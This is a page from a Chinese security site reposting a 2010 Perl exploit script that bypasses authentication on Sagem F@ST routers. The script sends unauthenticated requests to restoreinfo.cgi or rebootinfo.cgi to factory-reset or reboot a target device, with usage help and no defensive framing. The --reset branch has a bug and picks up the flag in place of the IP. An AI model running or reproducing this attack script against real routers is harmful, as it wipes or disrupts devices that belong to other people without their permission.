首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Sagem Routers Remote Auth bypass Exploit
来源:AlpHa[at]Hacker[dot]Bz 作者:AlpHaNiX 发布时间:2010-03-05  

#!/usr/bin/perl
# Exploit Title: Sagem routers Remote auth bypass Exploit
# Date: 04/03/2010
# Author: AlpHaNiX
# Software Link: null
# Version: Sagem Routers F@ST (1200/1240/1400/1400W/1500/1500-WG/2404
# Tested on: Sagem F@ST 2404


# Code :

use HTTP::Request;
use HTTP::Headers;
use LWP::UserAgent;
system('cls');

sub help()
{
    print "\n[X] the target must be sagem rooter main ip adress\n".
          "[X] affected Versions : Sagem Routers F@ST (1200/1240/1400/1400W/1500/1500-WG/2404)\n".
          "[X] Usage   : perl $0 --function ip \n".
          "[X] Example : ./exploit.pl<http://exploit.pl> --reset 192.168.1.1 \n".
          "[X] Example : ./exploit.pl<http://exploit.pl> --reboot 192.168.1.1 \n";
}
sub header()
{
    print "\n[+]====================================[+]\n".
          "[+] Sagem routers Remote Auth bypass   [+]\n".
          "[+] Found And Exploit By AlpHaNiX      [+]\n".
          "[+] Contact  : AlpHa[at]Hacker[dot]Bz  [+]\n".
          "[+] HomePage : NullArea.Net            [+]\n".
          "[+]====================================[+]\n\n\n"
}
sub resetz()
{
    my $target = $ipz."restoreinfo.cgi" ;
    my $request = HTTP::Request->new(GET=>$target);
    my $useragent = LWP::UserAgent->new();
    my $response = $useragent->request($request);
    if($response->content =~ m/<HTML><HEAD><TITLE>401 Unauthorized<\/TITLE><\/HEAD>/i && $response->content =~ m/<BODY BGCOLOR="#cc9999"><H4>401 Unauthorized<\/H4>/ && $response->content =~ m/<ADDRESS><A HREF="http:\/\/www.acme.com<http://www.acme.com>\/software\/micro_httpd\/">micro_httpd<\/A><\/ADDRESS>/ )
    {
        print "[+] Authentication bypassed !\n" ;
        print "[+] Exploited , $ip is restored" ;
    }
    else
    {
        print "[+] Please make sure you entered real sagem router ip\n" ;
    }
}

sub reboot()
{
    my $target = $ipz."rebootinfo.cgi" ;
    my $request = HTTP::Request->new(GET=>$target);
    my $useragent = LWP::UserAgent->new();
    my $response = $useragent->request($request);
    if($response->content =~ m/<HTML><HEAD><TITLE>401 Unauthorized<\/TITLE><\/HEAD>/i && $response->content =~ m/<BODY BGCOLOR="#cc9999"><H4>401 Unauthorized<\/H4>/ && $response->content =~ m/<ADDRESS><A HREF="http:\/\/www.acme.com<http://www.acme.com>\/software\/micro_httpd\/">micro_httpd<\/A><\/ADDRESS>/ )
    {
        print "[+] Authentication bypassed !\n" ;
        print "[+] Exploited , $ip is rebooted" ;
    }
    else
    {
        print "[+] Please make sure you entered real sagem router ip\n" ;
    }
}

if (@ARGV != 2) { header();help(); exit(); }
else{

    my $i=0;
    foreach (@ARGV)
    {
        if ($ARGV[$i] eq "--reboot"){$ip = $ARGV[$i+1];$function = 'reboot';}
        if ($ARGV[$i] eq "--reset"){$ip = $ARGV[$i];$function = 'reset';}
        $i++;
      }

if ($ip =~ /http:\/\// ) { $ipz = $ip."/"; } else { $ipz = "http://".$ip."/"}

header();
print "[+] Working on $ip ..\n\n";
if($function eq 'reboot'){reboot()}
if($function eq 'reset'){resetz()}
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Sagem Routers Remote Reset Exp
·WinSmMuPl 1.2.5 (.mp3) Local C
·AKoff MIDI Player v1.00 Buffer
·Sagem Routers remote authentic
·Linux x86 - disabled modsecuri
·Authentium Command Free Scan A
·WebEx UCF atucfobj.dll ActiveX
·Yahoo Player 1.0 (.m3u) Local
·BigForum Version 4.5 SQL Injec
·McAfee LinuxShield versions 1.
·WebKit Style Tag Remote Denial
·Microsoft OWC Spreadsheet HTML
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved